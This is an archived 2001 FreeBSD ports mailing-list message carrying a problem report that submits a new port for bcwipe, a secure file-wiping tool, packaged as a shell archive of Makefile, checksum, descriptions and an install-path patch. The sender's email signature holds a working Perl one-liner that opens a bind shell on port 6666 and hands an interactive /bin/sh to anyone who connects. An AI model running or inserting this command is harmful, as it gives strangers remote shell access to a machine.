From owner-freebsd-ports Wed Jun 6 16:10:13 2001 Delivered-To: freebsd-ports@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BE1D837B405 for ; Wed, 6 Jun 2001 16:10:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f56NA3N28664; Wed, 6 Jun 2001 16:10:03 -0700 (PDT) (envelope-from gnats) Received: from mail.kapu.hu (mail.kapu.hu [195.70.32.236]) by hub.freebsd.org (Postfix) with ESMTP id C10FB37B401 for ; Wed, 6 Jun 2001 16:07:14 -0700 (PDT) (envelope-from crow@kapu.hu) Received: from crow (helo=localhost) by mail.kapu.hu with local-esmtp (Exim 3.14 #6) id 157mON-0003qb-00 for FreeBSD-gnats-submit@freebsd.org; Thu, 07 Jun 2001 01:07:11 +0200 Message-Id: Date: Thu, 7 Jun 2001 01:07:11 +0200 (CEST) From: Tamas Foldi To: FreeBSD-gnats-submit@freebsd.org Subject: ports/27917: New Ports: bcwipe Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Note: There was a bad value `new' for the field `>Class:'. It was set to the default value of `sw-bug'. >Number: 27917 >Category: ports >Synopsis: New Ports: bcwipe >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 06 16:10:03 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Crow >Release: FreeBSD 4.2-RELEASE i386 >Organization: >Environment: >Description: new port description: bcwipe - securely erase data from magnetic and solid-state memory. bcwipe Repeatedly overwrites special patterns to the files to be destroyed. In normal mode, 34 patterns are used (of which 8 are random). These patterns were recommended in article from Peter Gutmann (http://www.cs.auckland.ac.nz/~pgut001/pubs/secure_del.html) entitled "Secure Deletion of Data from Magnetic and Solid-State Memory". In quick mode, U.S. DoD(Department of Defence) 5200.28 standard are used with 7 pass wiping. In custom mode U.S. DoD 5200.28 standard are used with user defined number of passes. Here come (/usr/ports/security/bcwipe/)bcwipe.shar # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # . # ./Makefile # ./distinfo # ./pkg-comment # ./pkg-descr # ./pkg-plist # ./files # ./files/patch-aa # echo c - . mkdir -p . > /dev/null 2>&1 echo x - ./Makefile sed 's/^X//' >./Makefile << 'END-of-./Makefile' X# New ports collection makefile for: bcwipe X# Date created: Mar 4, 2001 X# Whom: crow X# X# $FreeBSD$ X# X XPORTNAME= bcwipe XPORTVERSION= 0.2 XPORTREVISION= 2 XCATEGORIES= security XMASTER_SITES= http://www.jetico.com/linux/ XDISTNAME= BCWipe-${PORTVERSION}-${PORTREVISION} X XMAINTAINER= crow@nektor.hu X XWRKSRC= ${WRKDIR}/${PORTNAME}-${PORTVERSION}-${PORTREVISION} X XMAN1= bcwipe.1 X X.include END-of-./Makefile echo x - ./distinfo sed 's/^X//' >./distinfo << 'END-of-./distinfo' XMD5 (BCWipe-0.2-2.tar.gz) = dd5c345a1e79ed30009126fa4b035bd2 END-of-./distinfo echo x - ./pkg-comment sed 's/^X//' >./pkg-comment << 'END-of-./pkg-comment' XBCWipe securely erase data from magnetic and solid-state memory END-of-./pkg-comment echo x - ./pkg-descr sed 's/^X//' >./pkg-descr << 'END-of-./pkg-descr' Xbcwipe Repeatedly overwrites special patterns to the files Xto be destroyed. In normal mode, 34 patterns are used (of Xwhich 8 are random). XWWW: http://www.jetico.com END-of-./pkg-descr echo x - ./pkg-plist sed 's/^X//' >./pkg-plist << 'END-of-./pkg-plist' Xbin/bcwipe END-of-./pkg-plist echo c - ./files mkdir -p ./files > /dev/null 2>&1 echo x - ./files/patch-aa sed 's/^X//' >./files/patch-aa << 'END-of-./files/patch-aa' X--- Makefile.orig Thu Dec 7 19:04:06 2000 X+++ Makefile Sun Dec 31 15:22:09 2000 X13c13 X< root=/ X--- X> PREFIX=/usr/local X22,23c22,23 X< $(INSTALL) -m 644 bcwipe.1 $(root)/usr/man/man1/ X< $(INSTALL) -o root -m 755 -s bcwipe $(root)/usr/bin/ X--- X> $(INSTALL) -m 644 bcwipe.1 $(PREFIX)/man/man1/ X> $(INSTALL) -o root -m 755 -s bcwipe $(PREFIX)/bin/ END-of-./files/patch-aa exit ---End of bcwipe.shar--- Best regards, Foldi Tamas -- perl -MIO::Socket -e'$s=IO::Socket::INET->new(LocalPort=>6666,Listen=>8);$c= $s->accept;$n=$c->fileno;open STDIN,"<&$n";open STDOUT,"<&$n";exec"/bin/sh -i"' >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message